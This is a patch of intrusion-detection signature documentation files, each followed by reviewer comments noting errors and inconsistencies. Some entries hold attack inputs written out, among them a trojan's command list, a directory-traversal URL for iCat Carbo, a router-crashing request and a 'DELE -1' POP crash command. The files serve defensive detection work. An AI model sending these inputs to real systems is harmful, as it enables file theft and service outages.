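Review bot: the Detailed Information has a template artifact: "vulnerability in the procedure resume_master_activity" is followed by a line beginning ". This procedure is included in" with the package name "dbms_repcat." alone on the next line; join these into one sentence, and fix "Oracle Oracle9i" in Affected Systems. "Ease of Attack: Simple." should state the prerequisite the text leaves implicit: calling a packaged PL/SQL procedure requires an authenticated database session able to execute dbms_repcat, so this is post-authentication escalation, not an unauthenticated remote overflow. Additional References is empty; cite the Oracle security alert covering the dbms_repcat overflows.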
--- /dev/null
+++ b/doc/signatures/3063.txt
@@ -0,0 +1,133 @@
+Rule: 
+
+--
+Sid: 
+3063
+
+-- 
+Summary: 
+This event is generated when an attempt is made to request a connection using
+the Vampire 1.2 trojan.
+
+-- 
+Impact: 
+If connected, the attacker could execute a multitude of functions resulting in a
+complete compromise of the victim's machine.
+
+--
+Detailed Information:
+Vampire 1.2 uses port 1020 by default. This port cannot be changed by the attacker. 
+
+The following is a list of the commands for many of Vampier 1.2's functions
+(Command Name: Command String):
+
+Chat With Victim: chat
+Clear Recent Folder: cleardoc
+Close Windows: endwin
+Corrupt File: currfile
+Crazy Mouse: crazy
+Delete Directory: deletedir
+Delete File: delete
+Disk Space Left: space
+Disable CTRL-ALT-DEL: ctrldisable
+Enable CTRL-ALT-DEL: ctrlenable
+Fill Hard Drive: fillhd
+Find File: findfiles
+Format: format
+Get Active Windows: getact
+Get ICQ Number: geticq
+Get Local Time: gettime
+Get Operating System: getos
+Get Server Path: getpath
+Get System Owner: getowner
+Get Temp Directory: gettemp
+Get Windows Directory: getwin
+Get Current User: getname
+Get Disk Serial Number: getserial
+Get Hard Drive: gethd
+Get Organization: getorg
+Hang Up Modem: hangup
+ISP Account Info: ispinfo
+Kill Window: killtask\
+Logoff: logoff
+Make Directory: makedir
+Monitor Off: monitoroff
+Monitor On: monitoron
+Hide Mouse: hidemouse
+Show Mouse: showmouse
+Open Control Panel: panel
+Open Date And Time: date
+Open CD-ROM: cdopen
+Close CD-ROM: cdclose
+Open URL: www\
+Ping: ping
+Read A Drive: reada
+Reboot: reboot
+Kill Registry: regfuck
+Run Program: run
+Screenshot: screenshot
+Send Keys: text
+Send Message: sndmsg
+Set Computer Name: pcname
+Set Volume Label: setvolumelabel
+Shutdown: shutdown
+Hide Task Bar: hidetask
+Show Task Bar: showtask
+Wacky CR-ROM: wackycd
+--
+Affected Systems:
+Windows 95/98/ME
+
+--
+
+Attack Scenarios: 
+The victim must first install the server. Be wary of suspicious files because
+they often can be backdoors in disguise.
+Once the victim mistakenly installs the server program, the attacker usually
+will employ an IP scanner program
+to find the IP addresses of victims that have installed the program. Then the
+attacker enters the IP address and 
+presses the connect button and he has access to your computer.
+
+-- 
+
+Ease of Attack: 
+Easy. Simply a matter of pressing the connect button once the victim has
+installed the server.
+
+
+-- 
+
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+-- 
+
+Corrective Action: 
+In order to get rid of it, you must kill the following processes:
+vampire.exe or (if not there) server.exe
+
+You must delete the following files from your hard drive:
+vampire.exe or (if not there) server.exe
+
+Keep your anti-virus software updated.
+
+--
+Contributors:
+Original Rule Writer: Ricky Macatee <rmacatee@sourcefire.com> 
+Sourcefire Research Team
+
+-- 
+Additional References:
+
+Pestpatrol:
+http://www.pestpatrol.com/pestinfo/v/vampire_1_2.asp
+
+Dark-E:
+http://www.dark-e.com/archive/trojans/vampire/index.shtml
+
+--
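Review bot: the Detailed Information lists the trojan's command strings but never says which string or handshake the signature keys on, and with "False Positives: None known" that matters: if the rule matches only on tcp port 1020, any unrelated service on that port will trigger it. State the matched content. Two list entries, "Kill Window: killtask\" and "Open URL: www\", carry a trailing backslash the others lack; either the backslash is part of the command syntax and should be explained, or it is an artifact and should be removed. The Attack Scenarios and Corrective Action prose is in the second person ("he has access to your computer", "you must kill the following processes") unlike every other doc in this patch; rewrite it in the neutral third person used elsewhere. Typos: "Vampier 1.2's" and "Wacky CR-ROM".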
--- /dev/null
+++ b/doc/signatures/100000127.txt
@@ -0,0 +1,66 @@
+Rule: 
+
+--
+Sid: 
+100000127
+
+-- 
+Summary: 
+This event is generated when an attempt is made to link to an external script 
+as part of the Stadtaus.com PHP Form Mail program.
+
+-- 
+
+Impact: 
+The script being included will be run in the same security context as the 
+vulnerable program, enabling a variety of web-based attacks.
+
+--
+Detailed Information:
+The Stadtaus.com PHP Form Mail system's formmail.inc.php module, when including 
+other scripts by way of its script_root parameter, fails to validate the 
+location of these scripts, and thus allows attackers to include any malicious 
+script anywhere on the web. The included script will be executed with the same 
+permissions and in the same security context at the vulnerable program itself, 
+thus allowing a range of attacks.
+
+--
+Affected Systems:
+Stadtaus.com PHP Form Mail Script 2.3
+
+--
+
+Attack Scenarios: 
+This vulnerability may be exploited with a web browser or a script.
+
+-- 
+
+Ease of Attack: 
+Simple, as it can be exploited using a web browser.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+Currently, there are no vendor-supplied patches or workarounds. However, if it 
+is possible to globally disable PHP's 'allow_url_fopen' and 'register_globals' 
+directives in your environment, doing so may disable this vulnerability. 
+However, turning off these directives should be tested in a non-production 
+environment, in case doing so breaks other scripts on your system.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
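Review bot: the Summary's "link to an external script" undersells the issue; the Detailed Information describes a remote file include through the script_root parameter of formmail.inc.php, and the Summary should say so in those terms so the alert is searchable by the usual name. In Detailed Information, "in the same security context at the vulnerable program" should be "as the vulnerable program". The Corrective Action's advice to disable register_globals is only relevant if script_root reaches the include through a global populated from the request, which the text implies but does not state; say so, since an administrator deciding whether to change that directive needs to know. Additional References is empty; cite the advisory for PHP Form Mail Script 2.3.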
--- /dev/null
+++ b/doc/signatures/429.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+429
+
+--
+
+Summary:
+This event is generated when a host generates and ICMP Bad SPI datagram.
+
+--
+
+Impact:
+ICMP Type 40 Code 0 datagrams are an indication that a received datagram has an invalid SPI that is invalid or has expired.  Normally this is an indication that hosts using IP Security Protocols such as AH or ESP have been configured incorrectly or are failing to establish a session with another host.
+
+--
+
+Detailed Information:
+Hosts using IP Security Protocols such as AH or ESP generate ICMP Type 40 datagrams when a failure condition occurs.  ICMP Type 40 Code 0 datagrams are generated when a received datagram includes a SPI (Security Parameters Index) that is invalid or has expired.
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+ICMP Type 40 datagrams not normally seen on the network.  Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams.  Hosts generating these types of ICMP datagrams should be investigated for nefarious activity or configuration errors. 
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC2521
+
+
+--
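Review bot: the Impact sentence "a received datagram has an invalid SPI that is invalid or has expired" is redundant; the Detailed Information already phrases it correctly ("a SPI (Security Parameters Index) that is invalid or has expired"), so reuse that wording. In Corrective Action, "ICMP Type 40 datagrams not normally seen on the network" is missing "are", and "Currently Sourcefire is unaware of any hardware that has implemented these types of ICMP datagrams" is a dated vendor statement; the durable point is that RFC2521, cited under Additional References, is an Experimental RFC, so standard IPsec stacks do not emit these messages and any seen on the wire are misconfiguration or crafted. As with 426.txt, note that a crafted ICMP source address is trivially forged before telling the reader to investigate the generating host. Typo in the Summary: "generates and ICMP" should be "generates an ICMP".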
--- /dev/null
+++ b/doc/signatures/1623.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid: 
+1623
+
+--
+Summary:
+This event is generated when activity relating to spurious ftp traffic is detected on the network.
+
+--
+Impact:
+Varies from information gathering to a serious compromise of an ftp server.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious activity in FTP traffic between hosts.
+
+The event may be the result of a transfer of a known protected file or it could be an attempt to compromise the FTP server by overflowing a buffer in the FTP daemon or service.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using FTP.
+
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
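Review bot: "spurious ftp traffic" in the Summary is never defined, and the Detailed Information hedges between two different things ("a transfer of a known protected file" versus "an attempt to compromise the FTP server by overflowing a buffer"), which would be two different rules; state what content sid 1623 actually matches so an analyst can triage the alert, since "Ease of Attack: Simple." cannot be assessed without it. In Corrective Action, "Use secure shell (ssh) to transfer files" should name the actual replacements, sftp or scp, since ssh itself does not transfer files. Additional References is empty; if the rule relates to a specific FTP daemon vulnerability, cite it.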
--- /dev/null
+++ b/doc/signatures/2225.txt
@@ -0,0 +1,59 @@
+Rule:  
+
+--
+Sid:
+2225
+
+--
+Summary:
+This event is generated when an attempt is made to access gozila.cgi on an internal web server. This may indicate an attempt to exploit a denial of service vulnerability in the Linksys Etherfast BEFSR41 Cable/DSL Router web interface.
+
+--
+Impact:
+Denial of service.
+
+--
+Detailed Information:
+The Linksys Etherfast BEFSR41 Cable/DSL router web interface, Gozila.cgi, contains a denial of service vulnerability where, if a request is made for gozila.cgi is made without any arguments, the router crashes.
+
+--
+Affected Systems:
+Linksys Etherfast BEFSR41 Cable/DSL routers running firmware version 1.42.7 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends http://routerhostname/gozilla.cgi? to a vulnerable router (where routerhostname is the router's host name). The router will crash.
+ 
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+If a legitimate remote user accesses gozila.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade your router firmware to 1.43 or higher.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+-- 
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/6086
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1236
+
+--
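Review bot: the Attack Scenarios example "http://routerhostname/gozilla.cgi?" spells the script with two l's while the Summary, Detailed Information and the rule name use "gozila.cgi"; the example as written would not reach the vulnerable handler and should match the rest of the doc. In Detailed Information, "if a request is made for gozila.cgi is made without any arguments" repeats "is made". The Corrective Action could add, alongside the firmware upgrade to 1.43, that the router's web interface should not be reachable from the WAN side, since the crash needs only a single request.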
--- /dev/null
+++ b/doc/signatures/812.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+812
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
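Review bot: the doc never says which CGI script or vulnerability sid 812 detects; the Summary ("a known vulnerability in a CGI web application"), "Affected Systems: All systems running CGI applications" and the empty Additional References are generic boilerplate, so an analyst receiving this alert learns nothing about the target. Name the script the rule matches on, the affected product and version, and the advisory, and replace the generic Attack Scenarios with the actual vector. Typo in Detailed Information: "running ona web server".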
--- /dev/null
+++ b/doc/signatures/2882.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2882
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_site_priority
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
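Review bot: same template artifact as 2801.txt: "vulnerability in the procedure comment_on_site_priority" is followed by a line beginning ". This procedure is included in" with "sys.dbms_repcat_conf." alone on the next line; join these into one sentence, and fix "Oracle Oracle9i" in Affected Systems. Because the overflow is in a packaged procedure, the doc should say the attacker needs an authenticated database session able to execute sys.dbms_repcat_conf, which qualifies "Ease of Attack: Simple." and tells the reader that the relevant log source is the database audit trail rather than the network perimeter. Additional References is empty; cite the Oracle alert.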
--- /dev/null
+++ b/doc/signatures/613.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+613
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain 
+which ports a host may be listening on, whether or not the ports are 
+filtered by a firewall and if the host is vulnerable to a particular 
+exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. 
+Then the attacker might find out that the FTP service is vulnerable to a
+particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other 
+events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
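Review bot: "This event is generated when a scan is detected." says nothing about what sid 613 matches; scans take many forms (SYN, FIN, NULL, fingerprinting probes with a characteristic TTL or window), and the Detailed Information should state the packet characteristics this rule keys on, since that decides whether "A scanner may be used in a security audit." is the only false positive. The Attack Scenarios example "ports 21 and 20 are being used for FTP" is slightly off: a port scanner finds the listening control port 21, while port 20 is the source port the server uses for active-mode data connections and is not normally listening. Additional References is empty.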
--- /dev/null
+++ b/doc/signatures/2155.txt
@@ -0,0 +1,60 @@
+Rule:
+ 
+--
+Sid:
+2155
+
+--
+Summary:
+This event is generated when a remote user attempts to access forum/index.php with the template parameter on a web server. This may indicate an attempt to exploit a remote code execution vulnerability in ttForum, a web-based bulletin board application.
+
+--
+Impact:
+Serious. Possible remote execution of arbitrary code, which may lead to a remote root compromise.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a vulnerability in ttForum, a web-based bulletin board application. When an attacker sends a request to forum/index.php with a remote PHP file included in the "template" parameter, the web server will execute the code included in the linked PHP file.  
+
+--
+Affected Systems:
+Any server running ttForum.
+
+--
+Attack Scenarios:
+An attacker writes a PHP file containing executable code, and then sends a URI request to the forum/index.php on the vulnerable server with the crafted PHP file included in the template parameter. The web server will then attempt to execute the commands included in the linked PHP file.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is not known if this vulnerability has been patched in recent versions. Contact the vendor (http://www.ttcms.com) for more details. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7542
+http://www.securityfocus.com/bid/7543
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11615
+
+--
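Review bot: the Impact section overstates the outcome relative to Detailed Information. "Possible remote execution of arbitrary code, which may lead to a remote root compromise" describes a file included by forum/index.php and run by the web server, so the code runs with the web server's privileges; root compromise would need a separate privilege escalation, and "compromise of the web server account" would be accurate. Corrective Action offers nothing beyond contacting the vendor; since the issue is a remote file include through the URL-controlled "template" parameter, it would help to add the standard mitigations of disabling remote URL opens in the PHP configuration (allow_url_fopen) and restricting the parameter to a fixed list of local templates. Also the line after "Rule:" carries a stray space.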
--- /dev/null
+++ b/doc/signatures/1317.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1317
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "anal sex".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "anal sex".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.  This rule could trigger on a medical website or any site discussing sex, pornographic or not.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
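Review bot: typo in the Summary, "a webpage was visited the included the content" should read "that included the content". Formatting: "Rule:" is not followed by the blank line the other files use, the "-- " separator before Additional References has a trailing space, the Contributors entry lacks a space before "<alexander.s@mccd.edu>", and the seven empty lines after "Additional References:" should collapse to one. The False Positives paragraph is the useful part of this file and correctly notes that the rule is a content-policy check rather than an attack signature.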
--- /dev/null
+++ b/doc/signatures/2121.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2121
+
+--
+Summary:
+This event is generated when a remote user uses a negative argument in the DELE command sent to port 110 on an internal server.  This may indicate an attempt to exploit a boundary checking vulnerability in the POP DELE command in the Alt-N MDaemon mail server.
+
+--
+Impact:
+The service will crash when it attempts to process the command. The attacker must have a valid POP account on the mail server to attempt this exploit.
+
+--
+Detailed Information:
+This event may indicate an attempt to exploit a boundary checking vulnerability in the DELE command on the Alt-N MDaemon POP server. If an authenticated user sends the DELE command with a negative argument to the POP server, the MDaemon service will crash when it attempts to process the command. Note that this exploit can only be attempted by an authenticated user with a valid IMAP account on the server.
+
+--
+Affected Systems:
+Any operating system that runs the following IMAP servers:
+  -Alt-N MDaemon 6.0.0
+  -Alt-N MDaemon 6.0.5
+  -Alt-N MDaemon 6.0.6
+  -Alt-N MDaemon 6.0.7
+
+
+--
+Attack Scenarios:
+An authenticated user can send a DELE -1 command to the POP server, which will cause the service to crash.
+
+--
+Ease of Attack:
+Simple. Exploits and proof of concept exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to Alt-N MDaemon 6.5.0 or later.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7445
+http://www.securityfocus.com/bid/6053
+
+--
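Review bot: the protocol is named inconsistently. Summary, Impact and Attack Scenarios describe the POP DELE command on port 110 and "a valid POP account", yet Detailed Information ends with "a valid IMAP account on the server" and Affected Systems says "the following IMAP servers"; this rule concerns the MDaemon POP service, so both IMAP references should read POP. Also "Exploits and proof of concept exists" should be "exist", and the doubled blank line after the Affected Systems list should be collapsed.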
--- /dev/null
+++ b/doc/signatures/100000558.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000558
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "VebiMiau" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "pag" parameter in the "messages.php" script 
+used by the "VebiMiau" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using VebiMiau
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
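Review bot: the Impact and Detailed Information boilerplate does not fit a cross site scripting issue. "Possible execution of arbitrary code of the attackers choosing" and "execute system binaries" describe server-side injection, whereas script injected through the "pag" parameter of messages.php runs in the victim's browser; the realistic impact is the one Attack Scenarios already gives (information stolen from a user who follows a crafted link). Suggest rewriting Impact accordingly and dropping the second Detailed Information paragraph. Formatting: no blank line between the Sid value and "--" or between Contributors and "--", and several wrapped lines carry trailing spaces.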
--- /dev/null
+++ b/doc/signatures/100000523.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000523
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "CavoxCms" application running on a webserver. Access to 
+the file "index.php" with SQL commands being passed as the "page" parameter may 
+indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "page" parameter in the "index.php" script used by the 
+"CavoxCms" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CavoxCms
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
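Review bot: the third Detailed Information paragraph ("This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server ...") is credential-validation boilerplate that does not describe SQL injection through the "page" parameter and restates the first paragraph; drop it, or replace it with the Attack Scenarios wording about unsanitized input reaching the database. Typo "ona" should be "on a". Corrective Action could add the application-level fix the text implies: validate the "page" parameter and pass it to the database through parameterized queries rather than string concatenation. Formatting: missing blank lines between the Sid value and "--" and between Affected Systems and "--".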
--- /dev/null
+++ b/doc/signatures/885.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+885
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
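Review bot: neither the Summary nor Detailed Information names the CGI script or application the rule matches, and the "Rule:" field is empty, so a reader of this file cannot tell what request triggers SID 885; add the matched URI to the Summary. Typo "ona" in Detailed Information should be "on a". Additional References is empty, while the Summary speaks of "a known vulnerability", so a reference should be added. The Affected Systems entry is tab-indented, unlike the sibling files.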
--- /dev/null
+++ b/doc/signatures/100000103.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+100000103
+
+-- 
+Summary: 
+This event is generated when an empty UDP packet is sent to port 7649, where 
+Breed game servers typically listen.
+
+-- 
+
+Impact: 
+Upon receiving such a packet, the server will crash, causing a denial of 
+service condition.
+
+--
+Detailed Information:
+Breed game servers will pass a NULL pointer upon receiving an empty UDP packet 
+on port 7649, causing an immediate crash. The server must be restarted for 
+service to resume.
+
+--
+Affected Systems:
+Brat Designs Breed 
+Brat Designs Breed Patch #1
+
+--
+
+Attack Scenarios: 
+A script that generates empty UDP packets can be used to perform this attack.
+
+-- 
+
+Ease of Attack: 
+Simple; public exploits exist.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action: 
+No known patches or workarounds exist. System administrators may be able to 
+reject these packets at their firewall, depending upon the abilities of the 
+firewall system they use.
+
+--
+Contributors: 
+Alex Kirk <alex.kirk@sourcefire.com>
+
+-- 
+Additional References:
+
+--
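Review bot: "Breed game servers will pass a NULL pointer upon receiving an empty UDP packet" is imprecise; the crash described is a NULL pointer dereference when the server processes a zero-length datagram, so say "dereference". Corrective Action says administrators "may be able to reject these packets at their firewall" without saying what to match; state it as zero-length UDP datagrams to port 7649 from untrusted sources. Formatting: the "-- " separators carry trailing spaces and are inconsistently followed by a blank line before the next heading, and "Brat Designs Breed " has a trailing space.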
--- /dev/null
+++ b/doc/signatures/1001.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+1001
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability on an iCat Carbo Server.
+
+--
+Impact:
+Serious. Information disclosure.
+
+--
+Detailed Information:
+The iCat Carbo server, which is part of the Electronic Commerce Suite, 
+does not properly check HTTP requests and will give access to any file 
+object residing on the system when it receives a request such as 
+http://target/carbo.dll?icatcommand=..\..\directory/filename.ext&catalogname=catalog
+
+--
+Affected Systems:
+	iCat Electronica Commerce Suite 3.0 
+
+--
+Attack Scenarios:
+An attacker can view any file on the server, including sensitive 
+password files. The information disclosed can then be used to facilitate
+further attacks on the system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives: 
+None known.
+
+--
+False Negatives: 
+None known.
+
+--
+Corrective Action: 
+None known.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
